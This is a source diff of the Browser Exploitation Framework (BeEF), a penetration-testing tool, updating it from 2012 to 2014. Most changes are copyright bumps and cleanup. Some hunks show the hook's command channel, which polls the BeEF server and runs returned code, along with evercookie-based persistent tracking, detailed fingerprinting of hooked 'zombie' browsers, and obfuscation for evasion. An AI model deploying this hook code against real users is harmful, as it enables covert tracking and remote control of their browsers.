 // See the file 'doc/COPYING' for copying permission
 //
@@ -13,7 +13,8 @@ beef.session = {
 	
 	hook_session_id_length: 80,
 	hook_session_id_chars: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",	
-	ec: new evercookie(),	
+	ec: new evercookie(),
+    beefhook: "<%= @hook_session_name %>",
 	
 	/**
 	 * Gets a string which will be used to identify the hooked browser session
@@ -22,12 +23,12 @@ beef.session = {
 	 */
   	get_hook_session_id: function() {
 		// check if the browser is already known to the framework
-		var id = this.ec.evercookie_cookie("BEEFHOOK");
+		var id = this.ec.evercookie_cookie(beef.session.beefhook);
 		if (typeof id == 'undefined') {
-			var id = this.ec.evercookie_userdata("BEEFHOOK");
+			var id = this.ec.evercookie_userdata(beef.session.beefhook);
 		}
 		if (typeof id == 'undefined') {
-			var id = this.ec.evercookie_window("BEEFHOOK");
+			var id = this.ec.evercookie_window(beef.session.beefhook);
 		}
 		
 		// if the browser is not known create a hook session id and set it
@@ -47,9 +48,9 @@ beef.session = {
 	 */
   	set_hook_session_id: function(id) {
 		// persist the hook session id
-		this.ec.evercookie_cookie("BEEFHOOK", id);
-		this.ec.evercookie_userdata("BEEFHOOK", id);
-		this.ec.evercookie_window("BEEFHOOK", id);
+		this.ec.evercookie_cookie(beef.session.beefhook, id);
+		this.ec.evercookie_userdata(beef.session.beefhook, id);
+		this.ec.evercookie_window(beef.session.beefhook, id);
 	},
 	
 	/**

core/main/client/timeout.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/updater.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -15,6 +15,7 @@ beef.updater = {
 	
 	// XHR-polling timeout.
     xhr_poll_timeout: "<%= @xhr_poll_timeout %>",
+    beefhook: "<%= @hook_session_name %>",
 	
 	// A lock.
 	lock: false,
@@ -46,9 +47,8 @@ beef.updater = {
 				this.get_commands();    /*Polling*/
 			}
 		}
-
-      // ( typeof beef.websocket === "undefined")
-		setTimeout("beef.updater.check();", beef.updater.xhr_poll_timeout);
+        /* The following gives a stupid syntax error in IE, which can be ignored*/
+        setTimeout(function(){beef.updater.check()}, beef.updater.xhr_poll_timeout);
 	},
 	
     /**
@@ -57,7 +57,7 @@ beef.updater = {
 	get_commands: function() {
 		try {
 			this.lock = true;
-            beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, 'BEEFHOOK='+beef.session.get_hook_session_id(), 5, 'script', function(response) {
+            beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, beef.updater.beefhook+'='+beef.session.get_hook_session_id(), 5, 'script', function(response) {
                 if (response.body != null && response.body.length > 0)
                     beef.updater.execute_commands();
             });
@@ -80,6 +80,9 @@ beef.updater = {
 				command();
 			} catch(e) {
 				console.error('execute_commands - command failed to execute: ' + e.message);
+                // prints the command source to be executed, to better trace errors
+                // beef.client_debug must be enabled in the main config
+                beef.debug(command.toString());
 			}
 		}
 		this.lock = false;

core/main/client/websocket.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -53,9 +53,10 @@ beef.websocket = {
         };
 
         this.socket.onmessage = function (message) {
-            //todo: double-check if there is a way to don't use eval here. It's not a big deal,
-            //todo: because the eval'ed data comes from BeEF itself, so is implicitly trusted.
-            eval(message.data);
+            // Data coming from the WebSocket channel is either of String, Blob or ArrayBufferdata type.
+            // That's why it needs to be evaluated first. Using Function is a bit better than pure eval().
+            // It's not a big deal anyway, because the eval'ed data comes from BeEF itself, so it is implicitly trusted.
+            new Function(message.data)();
         };
 
         this.socket.onclose = function () {

core/main/command.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/configuration.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -22,14 +22,14 @@ module BeEF
       # @param [String] configuration_file Configuration file to be loaded, by default loads $root_dir/config.yaml
       def initialize(config)
         raise Exception::TypeError, '"config" needs to be a string' if not config.string?
-        raise Exception::TypeError, 'Configuration yaml cannot be found' if not File.exist?(config)
+        raise Exception::TypeError, "Configuration file '#{config}' cannot be found" if not File.exist?(config)
         begin
           #open base config
           @config = self.load(config)
           # set default value if key? does not exist
           @config.default = nil
           @@config = config
-        rescue Exception => e
+        rescue => e
           print_error "Fatal Error: cannot load configuration file"
           print_debug e
         end
@@ -44,7 +44,7 @@ module BeEF
           return nil if not File.exists?(file)
           raw = File.read(file)
           return YAML.load(raw)
-        rescue Exception => e
+        rescue => e
           print_debug "Unable to load '#{file}' #{e}"
           return nil
         end

core/main/console/banners.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -86,7 +86,7 @@ module Banners
         print_success "running on network interface: #{host}"
         beef_host = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")
         data = "Hook URL: #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.hook_file")}\n"
-        data += "UI URL:   #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.panel_path")}\n"
+        data += "UI URL:   #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.web_ui_basepath")}/panel\n"
         
         print_more data
       end

core/main/console/commandline.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/constants/browsers.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -7,75 +7,75 @@
 module BeEF
 module Core
 module Constants
-  
+
   module Browsers
 
-   	FF      = 'FF'       # Firefox
-   	M       = 'M'        # Mozila
-   	IE      = 'IE'       # Internet Explorer
-   	S       = 'S'        # Safari
-   	K       = 'K'        # Konqueror
-   	C       = 'C'        # Chrome
+    FF      = 'FF'       # Firefox
+    M       = 'M'        # Mozilla
+    IE      = 'IE'       # Internet Explorer
+    S       = 'S'        # Safari
+    K       = 'K'        # Konqueror
+    C       = 'C'        # Chrome
     O       = 'O'        # Opera
-   	ALL     = 'ALL'      # ALL
-   	UNKNOWN = 'UN'       # Unknown
-	
-   	FRIENDLY_FF_NAME  = 'Firefox' 
-   	FRIENDLY_M_NAME   = 'Mozila'
-   	FRIENDLY_IE_NAME  = 'Internet Explorer'
-   	FRIENDLY_S_NAME   = 'Safari'
-   	FRIENDLY_K_NAME   = 'Konqueror'
-   	FRIENDLY_C_NAME   = 'Chrome'
+    ALL     = 'ALL'      # ALL
+    UNKNOWN = 'UN'       # Unknown
+
+    FRIENDLY_FF_NAME  = 'Firefox'
+    FRIENDLY_M_NAME   = 'Mozilla'
+    FRIENDLY_IE_NAME  = 'Internet Explorer'
+    FRIENDLY_S_NAME   = 'Safari'
+    FRIENDLY_K_NAME   = 'Konqueror'
+    FRIENDLY_C_NAME   = 'Chrome'
     FRIENDLY_O_NAME   = 'Opera'
-   	FRIENDLY_UN_NAME  = "UNKNOWN"
- 
-    # Attempt to retrieve a browsers friendly name
+    FRIENDLY_UN_NAME  = 'UNKNOWN'
+
+    # Attempt to retrieve a browser's friendly name
     # @param [String] browser_name Short browser name
     # @return [String] Friendly browser name
-   	def self.friendly_name(browser_name)
-	  
-   	  case browser_name
-   	    when FF;       return FRIENDLY_FF_NAME 
-   	    when M;        return FRIENDLY_M_NAME 	   
-   	    when IE;       return FRIENDLY_IE_NAME   	   
-   	    when S;        return FRIENDLY_S_NAME  	   
-   	    when K;        return FRIENDLY_K_NAME  	   
-        when C;        return FRIENDLY_C_NAME
-        when O;        return FRIENDLY_O_NAME
+    def self.friendly_name(browser_name)
+
+      case browser_name
+        when FF;       return FRIENDLY_FF_NAME
+        when M ;       return FRIENDLY_M_NAME
+        when IE;       return FRIENDLY_IE_NAME
+        when S ;       return FRIENDLY_S_NAME
+        when K ;       return FRIENDLY_K_NAME
+        when C ;       return FRIENDLY_C_NAME
+        when O ;       return FRIENDLY_O_NAME
         when UNKNOWN;  return FRIENDLY_UN_NAME
-   	  end
-	    
-  	end
+      end
+
+    end
 
     # Attempt to match the browserstring to a browser constant
     # @param [String] browserstring Browser UA string
     # @return [Array] An array of matching browser constants
     # @todo Confirm this function returns an array if multiple constants are matched
-  	def self.match_browser(browserstring)
-  		matches = []
-			browserstring.split(" ").each do |chunk|
-			  case chunk
-			    when /Firefox/ , /FF/
-				    matches << FF
-			    when /Mozilla/
-				    matches << M
-				  when /Internet Explorer/, /IE/
-					  matches << IE
-				  when /Safari/
-			      matches << S
-				  when /Konqueror/
-				    matches << K
-				  when /Chrome/
-				    matches << C
-         when /Opera/
-				    matches << O
-				end
-			end
-			matches.uniq
-	  end
+    def self.match_browser(browserstring)
+      matches = []
+      browserstring.split(" ").each do |chunk|
+        case chunk
+        when /Firefox/, /FF/
+          matches << FF
+        when /Mozilla/
+          matches << M
+        when /Internet Explorer/, /IE/
+          matches << IE
+        when /Safari/
+          matches << S
+        when /Konqueror/
+          matches << K
+        when /Chrome/
+          matches << C
+        when /Opera/
+          matches << O
+        end
+      end
+      matches.uniq
+    end
 
   end
-  
+
 end
 end
 end

core/main/constants/commandmodule.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/constants/distributedengine.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/constants/hardware.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -12,6 +12,8 @@ module Constants
   module Hardware
 
     HW_UNKNOWN_IMG        = 'pc.png'
+	HW_VM_IMG             = 'vm.png'
+	HW_LAPTOP_IMG         = 'laptop.png'
 	HW_IPHONE_UA_STR      = 'iPhone'
  	HW_IPHONE_IMG         = 'iphone.jpg'
 	HW_IPAD_UA_STR	      = 'iPad'
@@ -32,8 +34,8 @@ module Constants
 	HW_HTC_IMG            = 'htc.ico'
 	HW_MOTOROLA_UA_STR    = 'motorola'
 	HW_MOTOROLA_IMG       = 'motorola.png'
-	HW_GOOGLE_UA_STR      = 'Nexus One'
-	HE_GOOGLE_IM          = 'nexus.png'
+	HW_GOOGLE_UA_STR      = 'Nexus'
+	HW_GOOGLE_IMG         = 'nexus.png'
 	HW_ERICSSON_UA_STR    = 'Ericsson'
 	HW_ERICSSON_IMG       = 'sony_ericsson.png'
 	HW_ALL_UA_STR         = 'All'

core/main/constants/os.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/crypto.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/distributed_engine/models/rules.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/handlers/browserdetails.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -68,6 +68,7 @@ module BeEF
                       }
           zombie.httpheaders = @http_headers.to_json
           zombie.save
+          #puts "HTTP Headers: #{zombie.httpheaders}"
 
           # add a log entry for the newly hooked browser
           BeEF::Core::Logger.instance.register('Zombie', "#{zombie.ip} just joined the horde from the domain: #{log_zombie_domain}:#{log_zombie_port.to_s}", "#{zombie.id}")
@@ -79,6 +80,56 @@ module BeEF
             self.err_msg "Invalid browser name returned from the hook browser's initial connection."
           end
 
+          # detect browser proxy
+          using_proxy = false
+          [
+            'CLIENT_IP',
+            'FORWARDED_FOR',
+            'FORWARDED',
+            'FORWARDED_FOR_IP',
+            'PROXY_CONNECTION',
+            'PROXY_AUTHENTICATE',
+            'X_FORWARDED',
+            'X_FORWARDED_FOR',
+            'VIA'
+          ].each do |header|
+            unless JSON.parse(zombie.httpheaders)[header].nil?
+              using_proxy = true
+              break
+            end
+          end
+
+          # retrieve proxy client IP
+          proxy_clients = []
+          [
+            'CLIENT_IP',
+            'FORWARDED_FOR',
+            'FORWARDED',
+            'FORWARDED_FOR_IP',
+            'X_FORWARDED',
+            'X_FORWARDED_FOR'
+          ].each do |header|
+            proxy_clients << "#{JSON.parse(zombie.httpheaders)[header]}" unless JSON.parse(zombie.httpheaders)[header].nil?
+          end
+
+          # retrieve proxy server
+          proxy_server = JSON.parse(zombie.httpheaders)['VIA'] unless JSON.parse(zombie.httpheaders)['VIA'].nil?
+
+          # store and log proxy details
+          if using_proxy == true
+            BD.set(session_id, 'UsingProxy', "#{using_proxy}")
+            proxy_log_string = "#{zombie.ip} is using a proxy"
+            unless proxy_clients.nil?
+              BD.set(session_id, 'ProxyClient', "#{proxy_clients.sort.uniq.join(',')}")
+              proxy_log_string += " [client: #{proxy_clients.sort.uniq.join(',')}]"
+            end
+            unless proxy_server.nil?
+              BD.set(session_id, 'ProxyServer', "#{proxy_server}")
+              proxy_log_string += " [server: #{proxy_server}]"
+            end
+            BeEF::Core::Logger.instance.register('Zombie', "#{proxy_log_string}", "#{zombie.id}")
+          end
+
           # get and store browser version
           browser_version = get_param(@data['results'], 'BrowserVersion')
           if BeEF::Filters.is_valid_browserversion?(browser_version)
@@ -168,11 +219,11 @@ module BeEF
           end
 
           # get and store the system platform
-          system_platform = get_param(@data['results'], 'SystemPlatform')
+          system_platform = get_param(@data['results'], 'BrowserPlatform')
           if BeEF::Filters.is_valid_system_platform?(system_platform)
-            BD.set(session_id, 'SystemPlatform', system_platform)
+            BD.set(session_id, 'BrowserPlatform', system_platform)
           else
-            self.err_msg "Invalid system platform returned from the hook browser's initial connection."
+            self.err_msg "Invalid browser platform returned from the hook browser's initial connection."
           end
 
           # get and store the hooked browser type
@@ -199,14 +250,6 @@ module BeEF
             self.err_msg "Invalid window size returned from the hook browser's initial connection."
           end
 
-          # get and store the yes|no value for JavaEnabled
-          java_enabled = get_param(@data['results'], 'JavaEnabled')
-          if BeEF::Filters.is_valid_yes_no?(java_enabled)
-            BD.set(session_id, 'JavaEnabled', java_enabled)
-          else
-            self.err_msg "Invalid value for JavaEnabled returned from the hook browser's initial connection."
-          end
-
           # get and store the yes|no value for VBScriptEnabled
           vbscript_enabled = get_param(@data['results'], 'VBScriptEnabled')
           if  BeEF::Filters.is_valid_yes_no?(vbscript_enabled)
@@ -239,6 +282,14 @@ module BeEF
             self.err_msg "Invalid value for HasGoogleGears returned from the hook browser's initial connection."
           end
 
+          # get and store the yes|no value for HasFoxit
+          has_foxit = get_param(@data['results'], 'HasFoxit')
+          if BeEF::Filters.is_valid_yes_no?(has_foxit)
+            BD.set(session_id, 'HasFoxit', has_foxit)
+          else
+            self.err_msg "Invalid value for HasFoxit returned from the hook browser's initial connection."
+          end
+
           # get and store the yes|no value for HasWebSocket
           has_web_socket = get_param(@data['results'], 'HasWebSocket')
           if BeEF::Filters.is_valid_yes_no?(has_web_socket)
@@ -247,6 +298,14 @@ module BeEF
             self.err_msg "Invalid value for HasWebSocket returned from the hook browser's initial connection."
           end
 
+          # get and store the yes|no value for HasWebRTC
+          has_webrtc = get_param(@data['results'], 'HasWebRTC')
+          if BeEF::Filters.is_valid_yes_no?(has_webrtc)
+            BD.set(session_id, 'HasWebRTC', has_webrtc)
+          else
+            self.err_msg "Invalid value for HasWebRTC returned from the hook browser's initial connection."
+          end
+
           # get and store the yes|no value for HasActiveX
           has_activex = get_param(@data['results'], 'HasActiveX')
           if BeEF::Filters.is_valid_yes_no?(has_activex)
@@ -255,6 +314,54 @@ module BeEF
             self.err_msg "Invalid value for HasActiveX returned from the hook browser's initial connection."
           end
 
+          # get and store the yes|no value for HasSilverlight
+          has_silverlight = get_param(@data['results'], 'HasSilverlight')
+          if BeEF::Filters.is_valid_yes_no?(has_silverlight)
+            BD.set(session_id, 'HasSilverlight', has_silverlight)
+          else
+            self.err_msg "Invalid value for HasSilverlight returned from the hook browser's initial connection."
+          end
+
+          # get and store the yes|no value for HasQuickTime
+          has_quicktime = get_param(@data['results'], 'HasQuickTime')
+          if BeEF::Filters.is_valid_yes_no?(has_quicktime)
+            BD.set(session_id, 'HasQuickTime', has_quicktime)
+          else
+            self.err_msg "Invalid value for HasQuickTime returned from the hook browser's initial connection."
+          end
+
+          # get and store the yes|no value for HasRealPlayer
+          has_realplayer = get_param(@data['results'], 'HasRealPlayer')
+          if BeEF::Filters.is_valid_yes_no?(has_realplayer)
+            BD.set(session_id, 'HasRealPlayer', has_realplayer)
+          else
+            self.err_msg "Invalid value for HasRealPlayer returned from the hook browser's initial connection."
+          end
+
+          # get and store the yes|no value for HasWMP
+          has_wmp = get_param(@data['results'], 'HasWMP')
+          if BeEF::Filters.is_valid_yes_no?(has_wmp)
+            BD.set(session_id, 'HasWMP', has_wmp)
+          else
+            self.err_msg "Invalid value for HasWMP returned from the hook browser's initial connection."
+          end
+
+          # get and store the value for CPU
+          cpu_type = get_param(@data['results'], 'CPU')
+          if !cpu_type.nil?
+            BD.set(session_id, 'CPU', cpu_type)
+          else
+            self.err_msg "Invalid value for CPU returned from the hook browser's initial connection."
+          end
+
+          # get and store the value for TouchEnabled
+          touch_enabled = get_param(@data['results'], 'TouchEnabled')
+          if BeEF::Filters.is_valid_yes_no?(touch_enabled)
+            BD.set(session_id, 'TouchEnabled', touch_enabled)
+          else
+            self.err_msg "Invalid value for TouchEnabled returned from the hook browser's initial connection."
+          end
+
           # get and store whether the browser has session cookies enabled
           has_session_cookies = get_param(@data['results'], 'hasSessionCookies')
           if BeEF::Filters.is_valid_yes_no?(has_session_cookies)

core/main/handlers/commands.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/handlers/hookedbrowsers.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -51,13 +51,25 @@ module Handlers
 
       # @note is a known browser so send instructions 
       else       
+        # @note Check if we haven't seen this browser for a while, log an event if we haven't
+        if (Time.new.to_i - hooked_browser.lastseen.to_i) > 60
+          BeEF::Core::Logger.instance.register('Zombie',"#{hooked_browser.ip} appears to have come back online","#{hooked_browser.id}")
+        end
+
         # @note record the last poll from the browser
         hooked_browser.lastseen = Time.new.to_i
         
         # @note Check for a change in zombie IP and log an event
-        if hooked_browser.ip != request.ip
-          BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.ip}","#{hooked_browser.id}")
-          hooked_browser.ip = request.ip
+        if config.get('beef.http.use_x_forward_for') == true
+          if hooked_browser.ip != request.env["HTTP_X_FORWARDED_FOR"]
+            BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.env["HTTP_X_FORWARDED_FOR"]}","#{hooked_browser.id}")
+            hooked_browser.ip = request.env["HTTP_X_FORWARDED_FOR"]
+          end
+        else
+          if hooked_browser.ip != request.ip
+           BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.ip}","#{hooked_browser.id}")
+           hooked_browser.ip = request.ip
+          end
         end
       
         hooked_browser.count!

core/main/handlers/modules/beefjs.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -21,7 +21,7 @@ module BeEF
             beef_js_path = "#{$root_dir}/core/main/client/"
 
             # @note External libraries (like jQuery) that are not evaluated with Eruby and possibly not obfuscated
-            ext_js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js)
+            ext_js_sub_files = %w(lib/jquery-1.10.2.min.js lib/jquery-migrate-1.2.1.min.js lib/evercookie.js lib/json2.js lib/jools.min.js lib/mdetect.js)
 
             # @note BeEF libraries: need Eruby evaluation and obfuscation
             beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js net/cors.js are.js)
@@ -66,6 +66,12 @@ module BeEF
             hook_session_config = BeEF::Core::Server.instance.to_h
 
             # @note if http_host="0.0.0.0" in config ini, use the host requested by client
+            unless hook_session_config['beef_public'].nil?
+              if hook_session_config['beef_host'] != hook_session_config['beef_public']
+                hook_session_config['beef_host'] = hook_session_config['beef_public']
+                hook_session_config['beef_url'].sub!(/#{hook_session_config['beef_host']}/, hook_session_config['beef_public'])
+              end
+            end
             if hook_session_config['beef_host'].eql? "0.0.0.0"
               hook_session_config['beef_host'] = req_host
               hook_session_config['beef_url'].sub!(/0\.0\.0\.0/, req_host)
@@ -74,6 +80,10 @@ module BeEF
             # @note set the XHR-polling timeout
             hook_session_config['xhr_poll_timeout'] = config.get("beef.http.xhr_poll_timeout")
 
+            # @note set the hook file path and BeEF's cookie name
+            hook_session_config['hook_file'] = config.get("beef.http.hook_file")
+            hook_session_config['hook_session_name'] = config.get("beef.http.hook_session_name")
+
             # @note if http_port <> public_port in config ini, use the public_port
             unless hook_session_config['beef_public_port'].nil?
               if hook_session_config['beef_port'] != hook_session_config['beef_public_port']
@@ -99,7 +109,7 @@ module BeEF
 
             if config.get("beef.extension.evasion.enable")
               evasion = BeEF::Extension::Evasion::Evasion.instance
-              @final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate + @hook) 
+              @final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate + @hook)
             else
               @final_hook = ext_js_to_not_obfuscate + @hook
             end

core/main/handlers/modules/command.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -29,6 +29,7 @@ module BeEF
               command_module = BeEF::Modules::Commands.const_get(command_module.path.split('/').last.capitalize).new
             else
               key = BeEF::Module.get_key_by_database_id(command.command_module_id)
+              (print_error "Could not find command module with ID #{command.command_module_id}"; return) if key.nil?
               command_module = BeEF::Core::Command.const_get(config.get("beef.module.#{key}.class")).new(key)
             end
 
@@ -52,7 +53,7 @@ module BeEF
             if config.get("beef.http.websocket.enable") && ws.getsocket(hooked_browser.session)
               #content = command_module.output.gsub('//
               #//
-              #//   Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+              #//   Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
               #//   Browser Exploitation Framework (BeEF) - http://beefproject.com
               #//   See the file 'doc/COPYING' for copying permission
               #//

core/main/logger.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -36,10 +36,9 @@ module Core
       raise Exception::TypeError, '"from" needs to be a string' if not from.string?
       raise Exception::TypeError, '"event" needs to be a string' if not event.string?
       raise Exception::TypeError, '"Hooked Browser ID" needs to be an integer' if not hb.integer?
-      
       # logging the new event into the database
       @logs.new(:type => "#{from}", :event => "#{event}", :date => time_now, :hooked_browser_id => hb).save
-
+      print_debug "Event: #{event}"
       # if notifications are enabled send the info there too
       if @notifications
         @notifications.new(from, event, time_now, hb)

core/main/migration.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/models/browserdetails.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -80,6 +80,7 @@ module Models
       
       return BeEF::Core::Constants::Os::OS_UNKNOWN_IMG if ua_string.nil?
       return BeEF::Core::Constants::Os::OS_WINDOWS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_WINDOWS_UA_STR
+      return BeEF::Core::Constants::Os::OS_ANDROID_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_ANDROID_UA_STR
       return BeEF::Core::Constants::Os::OS_LINUX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_LINUX_UA_STR
       return BeEF::Core::Constants::Os::OS_QNX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_QNX_UA_STR
       return BeEF::Core::Constants::Os::OS_BEOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BEOS_UA_STR
@@ -91,7 +92,6 @@ module Models
       return BeEF::Core::Constants::Os::OS_MAEMO_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAEMO_UA_STR
       return BeEF::Core::Constants::Os::OS_MAC_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAC_UA_STR
       return BeEF::Core::Constants::Os::OS_BLACKBERRY_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BLACKBERRY_UA_STR
-      return BeEF::Core::Constants::Os::OS_ANDROID_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_ANDROID_UA_STR
     
       BeEF::Core::Constants::Os::OS_UNKNOWN_IMG
     end
@@ -103,7 +103,9 @@ module Models
     def self.hw_icon(session_id)
 
       ua_string = get(session_id, 'BrowserReportedName')
-
+      hardware  = get(session_id, 'Hardware')
+      return BeEF::Core::Constants::Hardware::HW_VM_IMG if hardware =~ /Virtual Machine/
+      return BeEF::Core::Constants::Hardware::HW_LAPTOP_IMG if hardware =~ /Laptop/
       return BeEF::Core::Constants::Hardware::HW_UNKNOWN_IMG if ua_string.nil?
 
       return BeEF::Core::Constants::Hardware::HW_WINPHONE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_WINPHONE_UA_STR

core/main/models/command.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/models/commandmodule.rb

